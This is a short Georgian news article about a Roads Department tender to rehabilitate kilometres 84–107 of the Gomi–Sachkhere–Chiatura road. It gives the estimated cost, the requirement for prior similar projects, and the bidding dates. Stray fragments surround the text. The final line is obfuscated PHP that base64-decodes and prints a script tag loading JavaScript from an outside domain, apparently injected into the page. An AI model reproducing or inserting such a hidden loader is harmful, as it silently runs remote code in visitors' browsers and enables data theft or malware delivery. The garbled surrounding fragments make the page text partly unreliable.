celsiusi
ავერსი შნაიდერი
გამოქვეყნდა საავტომობილო გზების დეპარტამენტის ტენდერი, რომელიც გომი-საჩხერე-ჭიათურას გზის 84-107-ე კილომეტრების რეაბილიტაციას ითვალისწინებს.
 
შესყიდვის სავარაუდო ღირებულება 35,687,648 ლარს შეადგენს. სატენდერო პირობების თანახმად, ტენდერში მონაწილე კომპანიამ უნდა წარმოადგინოს დამდასტურებელი დოკუმენტაცია, რომელიც აჩვენებს, რომ მას 2017 წლის შემდეგ შესრულებული აქვს ანალოგიური მასშტაბის და სირთულის სულ მცირე ერთი პროექტი.
 
“ანალოგიური ტიპის, ხასიათის, სირთულის სამუშაოებს მიეკუთვნება: საავტომობილო გზების ან/და მასზე არსებული ხელოვნური ნაგებობების ისეთი მშენებლობის; ან/და რეკონსტრუქციის; ან/და მოდერნიზაციის; ან/და რეაბილიტაციის; ან/და პერიოდული შეკეთების; ან/და სტიქიის სალიკვიდაციო; ან/და პრევენციის სამუშაოები, რომელიც ითვალისწინებს გზის სამოსის მოწყობას,”- ნათქვამია სატენდერო პირობებში.
 
ტენდერში წინადადებების მიღება 18 აპრილს დაიწყო და 18 მაისს დასრულდება.
910
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");